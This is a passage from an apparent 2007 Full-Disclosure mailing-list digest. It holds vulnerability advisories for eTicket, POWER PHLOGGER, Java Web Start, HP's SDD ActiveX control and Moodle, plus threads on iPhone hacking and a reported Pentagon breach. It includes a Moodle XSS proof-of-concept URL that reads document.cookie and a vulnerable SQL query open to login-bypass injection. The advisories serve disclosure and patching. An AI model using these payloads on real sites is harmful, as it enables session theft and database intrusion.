or "man 5 bom" for details. bom = bill of materials. "The Mac OS X Installer uses a file system "bill of materials" to determine which files to install, remove, or upgrade." > * The security of the boot system plenty of digital signatures to > prevent firmware hacking? > > > -naif -- Simon Cooper From darkz.gsa at gmail.com Tue Jul 3 08:53:15 2007 From: darkz.gsa at gmail.com (Attila Gerendi) Date: Tue, 3 Jul 2007 10:53:15 +0300 Subject: [Full-disclosure] eTicket v.1.5.1.1 Multiple Cross-Site Scripting Message-ID: eTicket v.1.5.1.1 Multiple Cross-Site Scripting Author: Attila Gerendi (Darkz) Date: June 29, 2007 Package: eTicket (http://eticket.sourceforge.net/) Versions Affected: v.1.5.1.1 (Other versions may also be affected) Severity: XSS Input passed to "$_SERVER['REQUEST_URI']" in various scrips and includes is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which is executed in a user's browser session in context of an affected site when malicious data is viewed. Vulnerable code pieces: user_login.php on line 7:
admin_login.php on line 7: "" user_group.php on line 15: rep.php on line 15: pref.php on line 15: my.php on line 15: main.php on line 216: mail.php on line 16: cat.php on line 16: banlist_delete.php on line 13: banlist_delete.php on line 43: banlist_addedit.php on line 27: banlist_addedit.php on line 40: banlist.php on line 41: searc_form.php $surl=$_SERVER['PHP_SELF'].'?s='.$news; $qs=preg_replace('/s=(basic|advanced)/', '', $_SERVER['QUERY_STRING']); if ($qs != '') { $surl.=(substr($qs, 0, 1) == '&')?$qs:"&$qs"; } ?> [] Status: 1. Contacted the author at June 29, 2007 via sourceforge tracker ( https://sourceforge.net/tracker/?func=detail&atid=725721&aid=1745220&group_id=132967 ). 2. The author concluded "I am not happy that this is a real bug, and therefore will be closed until further notice." 3. After more work around on July 02 2007 the svn version was fixed. Solution: -edit the source code to ensure the input is properly sanitized. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070703/21edcf5d/attachment.html From darkz.gsa at gmail.com Tue Jul 3 08:56:55 2007 From: darkz.gsa at gmail.com (Attila Gerendi) Date: Tue, 3 Jul 2007 10:56:55 +0300 Subject: [Full-disclosure] POWER PHLOGGER v.2.2.5 (username) SQL Injection Message-ID: POWER PHLOGGER v.2.2.5 (username) SQL Injection Author: Attila Gerendi (Darkz) Date: June 25, 2007 Package: POWER PHLOGGER (http://www.phpee.com/) Versions Affected: v.2.2.5 (Other versions may also be affected) Severity: SQL Injection Description: Input passed to the "username" parameter in "login.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass login sequence. This SQL injection is "blind" so the user can not produce variations in the server input however using BENCHMARK it still can be used to retrieve sensitive data from the database and/or heavily load the server and produce DDOS attack. The vulnerable code piece is in "/include/get_userdata.php" /* assign the user's values */ $sql = "SELECT * FROM ".PPHL_TBL_USERS." WHERE id='$id' OR username='$id'"; $res = mysql_query($sql); the vulnerable parameter at this point is $id and it is set trough session variable $username from login.php without any sanitation. Status: The product web page say: "Active development of PowerPhlogger has been stopped as of August 2006. The announced successor Phlogger3 will not be released. Also, I am not able to provide you with support for any previous version.", so any user using this version should correct the bug herself. Solution: modify /* assign the user's values */ $sql = "SELECT * FROM ".PPHL_TBL_USERS." WHERE id='$id' OR username='$id'"; $res = mysql_query($sql); to /* assign the user's values */ $id = mysql_escape_string($id); $sql = "SELECT * FROM ".PPHL_TBL_USERS." WHERE id='$id' OR username='$id'"; $res = mysql_query($sql); -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070703/909a53af/attachment.html From nisr at ngssoftware.com Mon Jul 2 20:06:44 2007 From: nisr at ngssoftware.com (NGSSoftware Insight Security Research) Date: Mon, 2 Jul 2007 20:06:44 +0100 Subject: [Full-disclosure] High Risk Flaw in Sun's Java Web Start Message-ID: <022901c7bcdc$221d6fd0$4101a8c0@databasesecurity.com> John Heasman of NGSSoftware has discovered a high risk vulnerability in Sun Microsystem's Java Web Start that ships with the JRE and JDK on Windows platforms. The vulnerability affects the following version of Java Web Start: Java Web Start in JDK and JRE 5.0 Update 11 and earlier Java Web Start in SDK and JRE 1.4.2_13 and earlier This vulnerability permits an untrusted Java Web Start application to overwrite any file that can be accessed under the application user context. This ultimately enables an untrusted application to break out of the sandbox by modifying the user's Java security policy. An untrusted application could be launched via a malicious web page. Details ******* The JNLP API defines a set of services that bypass the security sandbox to enable some common client operations. The BasicService is used to discover the application's codebase. Then, the PersistenceService caches content on the local hard drive, keyed to a URL that is relative to the application's base. The name/value pairs provided by the PersistenceService are similar to browser cookies. The Java Web Start implementation honours this legacy by naming the pairs "muffins". Arbitrary files can be written to due to a directory traversal flaw in the PersistenceService. Solution ******** This issue has now been resolved; further details are available at: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102957-1 NGSSoftware Insight Security Research http://www.ngssoftware.com http://www.databasesecurity.com/ +44(0)208 401 0070 -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402 From Robert.Clark at cern.ch Tue Jul 3 08:22:55 2007 From: Robert.Clark at cern.ch (Robert Clark) Date: Tue, 03 Jul 2007 09:22:55 +0200 Subject: [Full-disclosure] [Dailydave] iPhone Roadblock In-Reply-To: <42210a440706301828u10a5d8eer688a381b96f604f5@mail.gmail.com> References: <42210a440706301828u10a5d8eer688a381b96f604f5@mail.gmail.com> Message-ID: <4689F94F.8010800@cern.ch> matthew wollenweber wrote: > I'm one of the lucky (or possibly crazy) people that managed to get an > iPhone yesterday. If you're curious, I'm very happy with it so far. I'm not > an Apple nut that buys all things Apple, but after years of "smartphones" > that never seemed quite right, the iPhone really seems to have hit the > mark. > My biggest worry was that it used Edge rather than 3G. While at some points > this is noticeable, the caching and windowing mechanisms really make up for > the difference. On the whole it's the best smartphone experience I've had. > But you can read all the reviews in a more appropriate forum... > > I'm really interested in hacking up my iPhone. Anything with a *nix OS > underneath is just too tempting to leave alone. Unfortunately Apple threw a > curve ball that's outside my skill set. The iPhone doesn't mount as a > harddrive. I couldn't find any options in iTunes and in linux I only got: > > Jun 30 21:25:42 lothlorien kernel: usb 1-4: new full speed USB device using > ehci_hcd and address 15 > Jun 30 21:25:42 lothlorien kernel: usb 1-4: Product: iPhone > Jun 30 21:25:42 lothlorien kernel: usb 1-4: Manufacturer: Apple Inc. > Jun 30 21:25:42 lothlorien kernel: usb 1-4: SerialNumber: XYZ123456789 > Jun 30 21:25:42 lothlorien kernel: usb 1-4: configuration #1 chosen from 3 > choices > > USB device drivers aren't my thing. Anyone have any suggestions on how to > get the thing mounted or to go about figuring out how to do so? > > Thanks for any help. > Its incredibly unlikely that you will be able to mount the underlying OS filesystem in any way or form. I expect (as is often the case) the most viable way to hack the iPhone will be using its official firmware upgrading system and a hacked firmware which poses as an official one. Without doubt, we are in for some interesting discoveries. -- /** * Robert Clark ** * Technical Student ALICE/DAQ * Software Engineer CERN PH/AID */ From 3APA3A at SECURITY.NNOV.RU Tue Jul 3 10:10:27 2007 From: 3APA3A at SECURITY.NNOV.RU (3APA3A) Date: Tue, 3 Jul 2007 13:10:27 +0400 Subject: [Full-disclosure] Moodle XSS / Liesbeth base CMS sensitive information disclosure Message-ID: <9010110361.20070703131027@SECURITY.NNOV.RU> Dear bugtraq at securityfocus.com, 1. MustLive (mustlive at websecurity.com dot ua) reported crossite scripting vulnerability in Moodle 1.7.1 via search parameter of index.php, example: http://host/user/index.php?contextid=4&roleid=0&id=2&group=&perpage=20&search=%22style=xss:expression(alert(document.cookie))%20 Detailed information (in Ukranian) http://websecurity.com.ua/1045/ Original message (in Russian) http://securityvulns.ru/Rdocument391.html 2. Durito [damagelab] (durito at mail dot ru) reported information leak in Liesbeth base CMS (Vendor: www.doubleflex.com), example: http://host/config.inc file accessible through Web contains sensitive information, including database account. Original message (in Russian) http://securityvulns.ru/Rdocument392.html -- http://securityvulns.com/ /\_/\ { , . } |\ +--oQQo->{ ^ }<-----+ \ | ZARAZA U 3APA3A } You know my name - look up my number (The Beatles) +-------------o66o--+ / |/ From nick at virus-l.demon.co.uk Tue Jul 3 11:28:32 2007 From: nick at virus-l.demon.co.uk (Nick FitzGerald) Date: Tue, 03 Jul 2007 22:28:32 +1200 Subject: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time) In-Reply-To: <1183433582.2817.3.camel@localhost> References: <1183433582.2817.3.camel@localhost> Message-ID: <468ACD90.5482.6380D050@nick.virus-l.demon.co.uk> Jim Popovitch wrote: > The US DoD gets hit all the time... not because they are so much > insecure, but because they are such a primary target. It's a fact of > life, just like doctors and nurses are the most vulnerable to contract a > disease. There are precautions, and they are taken, but the odds are > greater. _AND_ at least they noticed and moved to act against it. Every day, many hundreds of thousands of _successful_ attacks against corporations, small businesses and private individuals not only go unreported by them, but entirely undetected and largely unnoticed by the _attacked_. The reason for this comment? A great many of those mocking the DHS over this incident are part of the group just mentioned and are too stupid to ever realize it... Regards, Nick FitzGerald From nisr at ngssoftware.com Tue Jul 3 11:20:34 2007 From: nisr at ngssoftware.com (NGSSoftware Insight Security Research) Date: Tue, 3 Jul 2007 11:20:34 +0100 Subject: [Full-disclosure] Buffer overflow in HP Instant Support Driver Check (SDD) ActiveX control Message-ID: <027201c7bd5b$cc411780$4101a8c0@databasesecurity.com> John Heasman of NGSSoftware has discovered a high risk vulnerability in the HP Instant Support Driver Check (SDD) ActiveX control, which is marked safe for scripting. The vulnerability affects the following version of the SDD control: HP Instant Support Driver Check versions prior to 1.5.0.3 This vulnerability could be exploited on a malicious web page in order to execute arbitrary code under the user context of the browser. Details ******* The queryHub([IN] BSTR bstrValue) method contains a stack based buffer overflow. Solution ******** This issue has now been resolved in version 1.5.0.3. Further details are available at: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01077597 NGSSoftware Insight Security Research http://www.ngssoftware.com http://www.databasesecurity.com/ http://www.nextgenss.com/ +44(0)208 401 0070 -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402 From sil at infiltrated.net Tue Jul 3 13:21:42 2007 From: sil at infiltrated.net (J. Oquendo) Date: Tue, 03 Jul 2007 08:21:42 -0400 Subject: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time) In-Reply-To: <468ACD90.5482.6380D050@nick.virus-l.demon.co.uk> References: <1183433582.2817.3.camel@localhost> <468ACD90.5482.6380D050@nick.virus-l.demon.co.uk> Message-ID: <468A3F56.8040106@infiltrated.net> Nick FitzGerald wrote: > > _AND_ at least they noticed and moved to act against it. > > Every day, many hundreds of thousands of _successful_ attacks against > corporations, small businesses and private individuals not only go > unreported by them, but entirely undetected and largely unnoticed by > the _attacked_. > > The reason for this comment? A great many of those mocking the DHS > over this incident are part of the group just mentioned and are too > stupid to ever realize it... > An also *informed* number of members realize the potential of gaining greater budgets by leaving machines vulnerable in an effort to lobby congress for yet more pork barrel money to "secure" these networks from "uber" hackers. So let's sift through crapaganda while its on the table shall we. /* SNIP */ "?China has downloaded 10 to 20 terabytes of data from the NIPRNet (DOD?s Non-Classified IP Router Network),? said Maj. Gen. William Lord, director of information, services and integration in the Air Force?s Office of Warfighting Integration and Chief Information Officer, during the recent Air Force IT Conference in Montgomery, Ala. (http://www.gcn.com/print/25_25/41716-1.html)" /* END SNIP */ 20 Terabytes huh. Unnoticed 20 terabytes? At that rate they would need some massive pipes to download this all undetected. Let's analyze the comment and the logic... 20 terabytes on an OC3 would take you 291 hours 44 minutes and 16 seconds give or take. Gigabit Ethernet, 45 hours 30 minutes and change... So how did they manage do achieve this marvelous feat of magic undetected. It obviously couldn't be at high speeds which means they would have had to either go on undetected for quite some time, or they embedded fiber taps INSIDE of a DoD location (doubtable). 20 terabytes... I'll tell you what I think usually happens with DoD and governmental sectors... Private corporations and those in them slacking (http://cryptome.org/cg-leakage.htm). Do I blame DoD, absolutely. I take a different view of this altogether under a what if I was a contractor with no one monitoring me... Dictating to secretary: "We need another million for these uh golf... *scratch that* for these vertically integrated, high end clustered reverse path packet injection token based AES FIPS standardized firewalls. Its cutting edge technology which guarantees and mitigates against unauthorized intrusions". The government should undertake a *real* method to secure their infrastucture. Have it revamped by industry experts and implemented by those same experts. Not some deep pocket contractors who will skim so much of the money away and into accounts in the triple borders. (reality... like it or not) -- ==================================================== J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743 echo infiltrated.net|sed 's/^/sil@/g' "Wise men talk because they have something to say; fools, because they have to say something." -- Plato -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/x-pkcs7-signature Size: 5157 bytes Desc: S/MIME Cryptographic Signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070703/e9778fc4/attachment.bin From garyo at sec-1.com Tue Jul 3 14:05:06 2007 From: garyo at sec-1.com (Gary Oleary-Steele) Date: Tue, 3 Jul 2007 14:05:06 +0100 Subject: [Full-disclosure] [Sec-1 Ltd] Buffer Truncation Abuse in Microsoft SQL Server Based Applications Message-ID: Buffer Truncation Abuse in Microsoft SQL Server Based Applications Release Date: 3rd July 2007 Author: Gary O'Leary-Steele Web Site: www.sec-1.com This paper is designed to document an attack technique Sec-1 recently adopted during the course of their application assessments. The basic principal of this technique has existed for some time; however we hope this paper we will provide an insight of how a variation of the technique can be adopted to attack common "forgotten password" functionality within web applications. Our initial intention was to release this paper along with a case study demonstrating the flaw within a commercial application. However since the vendor has yet to fix the flaw it was decided that an initial censored release will be followed up with the complete release further down the line. The paper can be downloaded here: http://www.sec-1labs.co.uk/papers/BTA_CensoredRelease.pdf Sec-1 specialises in the provision of network security solutions. For more information on products and services we offer visit www.sec-1.com or call 0113 257 8955. From geoincidents at nls.net Tue Jul 3 14:50:27 2007 From: geoincidents at nls.net (Geo.) Date: Tue, 3 Jul 2007 09:50:27 -0400 Subject: [Full-disclosure] This pages crashes browsers In-Reply-To: <027201c7bd5b$cc411780$4101a8c0@databasesecurity.com> Message-ID: Found this page, click on "Accessories" then try to print the page, it seems to crash all the browsers I have soon as I try to print. Thought someone here might like to play with the crash. http://www.movincool.com/portable-air-conditioner/officepro60.php# From Larry at larryseltzer.com Tue Jul 3 15:05:54 2007 From: Larry at larryseltzer.com (Larry Seltzer) Date: Tue, 3 Jul 2007 10:05:54 -0400 Subject: [Full-disclosure] This pages crashes browsers In-Reply-To: References: <027201c7bd5b$cc411780$4101a8c0@databasesecurity.com> Message-ID: <0273B67044957C41BD71D12EBA2E00AE1A1D7A@becca.LarrySeltzer.local> >>Found this page, click on "Accessories" then try to print the page, it seems to crash all the browsers I have soon as I try to print. Thought someone here might like to play with the crash. Printed from IE7 and FF 2.0.0.4 no problems. Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.eweek.com/cheap_hack/ Contributing Editor, PC Magazine larryseltzer at ziffdavis.com From mwollenweber at gmail.com Tue Jul 3 15:23:55 2007 From: mwollenweber at gmail.com (matthew wollenweber) Date: Tue, 3 Jul 2007 10:23:55 -0400 Subject: [Full-disclosure] [Dailydave] iPhone Roadblock In-Reply-To: <4689F94F.8010800@cern.ch> References: <42210a440706301828u10a5d8eer688a381b96f604f5@mail.gmail.com> <4689F94F.8010800@cern.ch> Message-ID: <42210a440707030723m29238e0p27a91d311e86cac6@mail.gmail.com> Actually the guys over at: http://iphone.fiveforty.net/wikiare pretty far along of mounting the iPhone. The can read a files from a sandbox setup on the phone for iTunes. I believe they're hooking the iTunes dlls being used and REing a basic interface. Also, I haven't heard of anyone doing serious work regarding loading unofficial firmware. I'm sure that's a route people may consider, but everyone seems happy with the iPhone and just want it to do m